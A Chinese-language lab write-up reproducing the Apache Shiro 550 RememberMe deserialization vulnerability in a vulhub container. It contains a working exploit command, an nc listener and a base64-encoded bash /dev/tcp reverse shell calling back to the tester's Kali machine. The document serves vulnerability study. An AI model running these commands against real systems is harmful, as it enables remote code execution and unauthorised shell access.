Shiro 550 漏洞复现
环境搭建
使用vulhub进行搭建,这个vulhub还是很方便的
漏洞原理
漏洞出现在cookie中的RememberMe字段中,说的简单通俗易懂些,当服务端获取到RememberMe后,会进行如下操作
- base64解密
- AES解密
- 反序列化
知道他的工作流程后,我们只需要将自己的payload反向操作就好了
- 序列化
- AES加密
- base64加密
现在最关键的就是AES的密钥,然而恰巧的是Shiro 550中的AES密钥是硬编码写死在代码里的,所以密钥是不会变的,每个人可以通过源代码获取到密钥。
漏洞复现
靶机IP:192.168.214.136
Kali:192.168.214.129
POC:https://github.com/insightglacier/Shiro_exploit
在Kali里执行POC,来验证是否可行
创建一个a.txt文件
代码语言:javascript复制root@kali:~/Desktop/Shiro_exploit-master# python3 shiro_exploit.py -t 3 -u http://192.168.214.136 -p "touch a.txt"
等待结束就好
结束后进入容器查看docker exec -it 4f /bin/bash,是存在a.txt,说明次POC可行,可以命令执行。
在Kali上nc监听
代码语言:javascript复制nc -lvp 4444加密反弹shell
加密网站:http://jackson-t.ca/runtime-exec-payloads.html
加密前
代码语言:javascript复制bash -i >& /dev/tcp/192.168.214.129/4444 0>&1加密后
代码语言:javascript复制bash -c {echo,YmFzaCAtaSA JiAvZGV2L3RjcC8xOTIuMTY4LjIxNC4xMjkvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}
使用Shiro_exploit的poc漏洞执行反弹shell
代码语言:javascript复制python3 shiro_exploit.py -t 3 -u http://192.168.214.136 -p "bash -c {echo,YmFzaCAtaSA JiAvZGV2L3RjcC8xOTIuMTY4LjIxNC4xMjkvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"连接成功
成功连接到了docker里。
总结
这次只是复现了这个漏洞,并没有对其原理做更多的解释。后续可以在对其进行研究,还有需要复现一下Shiro 721。
Q.E.D.
